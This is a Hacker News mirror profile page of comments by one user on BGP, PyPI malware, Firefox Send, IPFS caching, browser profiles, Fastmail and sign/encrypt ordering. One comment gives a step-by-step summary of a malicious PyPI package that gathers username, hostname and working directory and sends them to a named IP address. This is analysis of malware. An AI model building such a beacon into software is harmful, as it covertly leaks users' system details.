Readit News logoReadit News
b101010 commented on Playing battleships over BGP   blog.benjojo.co.uk/post/b... · Posted by u/benjojo12
xingped · 7 years ago
Does anyone have any recommended resources for learning more about and playing with BGP?
b101010 · 7 years ago
Have a look at dn42.

https://dn42.net/Home

b101010 commented on Malicious software libraries found in PyPI posing as well known libraries   nbu.gov.sk/skcsirt-sa-201... · Posted by u/nariinano
a3n · 8 years ago
Dry run?
b101010 · 8 years ago
The "malicious" code at the end of the advisory looks like nothing more than a beacon announcing it was installed?

  edit:
  get current working directory
  get username
  get hostname
  concatenate the last 3 together
  obfuscate(/encrypt?) this string
  send the result as a http request to 121.42.217.44 (the value of the base64 string)

b101010 commented on Build command line apps using PHP 7   github.com/tarsana/comman... · Posted by u/webNeat
carlmr · 8 years ago
Why?
b101010 · 8 years ago
php-cli scripts normally don't have an execution time limit (or a memory limit?), which makes them ideal for upgrades/database maintenance/cron jobs/etc while being able to reuse code from the application itself

one example: https://docs.moodle.org/22/en/Administration_via_command_lin...

b101010 commented on Mozilla’s Send makes it easy to send a file from one person to another   theverge.com/2017/8/2/160... · Posted by u/Tomte
brianberns · 8 years ago
> Mozilla says it “does not have the ability to access the content of your encrypted file.”

This can't possibly be true. Since Mozilla is encrypting the file, they can also decrypt it (and must do so when the recipient downloads it).

Edit: I was wrong, but will leave this comment because the explanation is useful.

b101010 · 8 years ago
The share links look like this

https:// send.firefox.com/download/<$file_identifier>/#<$encryption_key>

Data after the # in the url should not be sent to the http server by the client. Encryption/decryption is presumably handled in the users browser by JavaScript.

The statement about not having the ability to access the contents of the files is perhaps somewhat misleading as they do control the JavaScript that either creates the key or will be given access to the key when someone retrieves the file (by reading it off the end of the url).

b101010 commented on A security update for the Raspberry Pi   raspberrypi.org/blog/a-se... · Posted by u/alexellisuk
jcriddle4 · 9 years ago
I wonder if instead they could setup a fake or jailed SSH that would let you login, it would then display helpful info about how to really enable SSH and then it would kick you out?
b101010 · 9 years ago
part of this can be done with openSSH by setting the banner option in sshd_config.

"Banner The contents of the specified file are sent to the remote user before authentication is allowed. If the argument is ``none'' then no banner is displayed. By default, no banner is displayed."

b101010 commented on Orbit – Distributed, serverless, peer-to-peer chat application on IPFS   github.com/haadcode/orbit... · Posted by u/niklasbuschmann
kefka · 9 years ago
Not true.

You share:

1. Files you Pinned (think of as torrent seeding)

2. Files you have in your IPFS cache

     a. Cache files are added to when you request IPFS content
     b. The garbage collection triggers and removes non-pinned content at regular intervals
3. The default files that are added to a new IPFS repo (unless you removed them or init'ed using the appropriate option to not include them)

To answer the GP's question: As long as you don't pin child porn, and you don't look for child porn, there's 0% chance in IPFS-land.

b101010 · 9 years ago
Would (a) not be

  a. Cache files are added to when _something causes a request for_ IPFS content
The distinction being that "something" is not always a direct action from the user.

If content on IPFS (ie a web page?) can reference and load content from other addresses (assumption) then could someone end up in the situation where they are "hosting" (from the cache) something they would not expect to be? (until the garbage collection clears it).

If this seems far fetched, A submission to HN the other day seemed to surprise a few people[1] as it made a http request to a adult website to check if they had an active session (but did not display any content).

[1] https://news.ycombinator.com/item?id=12692389

b101010 commented on Show HN: Your Social Media Fingerprint (maybe NSFW)   robinlinus.github.io/soci... · Posted by u/Capira
zerognowl · 9 years ago
This is why I use 'browser isolation', which is a way to separate different types of surfing activity into different buckets. Currently the best way to do this in Firefox is to create multiple profiles, or in Chrome, you can simply add a different user/persona.

Having one profile, or even an entire dedicated browser just for Twitter/FB ensures the login is not spilled over into other sites. If you're surfing the web heavily, I would recommend spawning a new private window so cookies, and other artefacts are not bleeding into your session.

It sounds like common sense, but many people have cookies and login information persisting for years at a time in their browsing sessions. The Mozilla Firefox team are planning to introduce a feature which makes compartmented surfing sessions a lot more user-friendly by separating sessions into tabs. Currently, the 'profiles' feature of Firefox is not user friendly and requires a bit of tinkering with the filesystem.

b101010 · 9 years ago
For anyone wanting to do this, the profile and no-remote command line options[1] may be useful if you want to create shortcuts to launch specific profiles

You might also want to consider using a different theme[2] in each profile to help avoid mixing them up if your running multiple instances simultaneously.

My initial use case for this was adding the lets encrypt staging certificate authority to the trusted root certificate authorities in a profile only used for testing.

[1] https://developer.mozilla.org/en-US/docs/Mozilla/Command_Lin... [2] https://addons.mozilla.org/en-US/firefox/themes/

b101010 commented on Fastmail.com suffering DDOS attack   fastmailstatus.com/servic... · Posted by u/moonlighter
JoshTriplett · 9 years ago
> 1.) Run your own SMTP infrastructure. Setup SPF/DKIM/DMARC. Realize your outbound emails still don't always reach their destination. Also you have to fight inbound SPAM.

And if someone wants to DDoS you, you're a lot more vulnerable than a major provider like Fastmail.

Personally, I use a hybrid solution: I use Gandi's SMTP servers for outbound and inbound mail, but I run my own IMAP server for unlimited storage under my control.

b101010 · 9 years ago
If the attacker has ever seen the headers of a message you sent through fastmails SMTP service they have your public IP (Received from header) and can Dos you directly anyway.

They do something similar with their webmail service, but the data is encrypted so it can't be read by a third party.

https://www.fastmail.com/about/reportabuse.html (last paragraph)

EDIT: Fastmail is fairly priced (for me) and i like the features they offer but i wish they wouldn't do this (or rather, i wish they would do the same for the SMTP service as they do for the webmail service)

b101010 commented on “Should you encrypt or compress first?”   blog.appcanary.com/2016/e... · Posted by u/phillmv
mikeash · 9 years ago
It's pointless. If you sign the encrypted data, then once the signature is verified in the receiver, you know that the decrypted data is also good. Repeating the signature just wastes time and space.
b101010 · 9 years ago
After some thought, The only advantage of signing before and after i can think of is without it you are left with the (theoretical?) problem of not knowing if the output from your implementation/version of the utility to decrypt/decompress is identical to the senders input to their implementation of the utility if the sender only signs the compressed/encrypted version.

Of course, if the compression/encryption method has some way of checking the integrity of the output (that's of equal strength to the signature) then then signing first would be completely redundant.

EDIT: so in many scenarios, signing first and last would have no advantage. For example if you get to decide what implementation will be used by the sender and the recipient (most package managers?)

b101010 commented on “Should you encrypt or compress first?”   blog.appcanary.com/2016/e... · Posted by u/phillmv
vog · 9 years ago
Good catch!

Although the article talks about encrypt+sign versus sign+encrypt, the same argument goes for compress+sign versus sign+compress.

b101010 · 9 years ago
Why is the debate about "compress/encrypt then sign" vs "sign then compress/encrypt"?

Is there a non obvious problem with sign then compress/encrypt then sign again? (overcomplicated or unnecessary?)

u/b101010

KarmaCake day31January 28, 2015View Original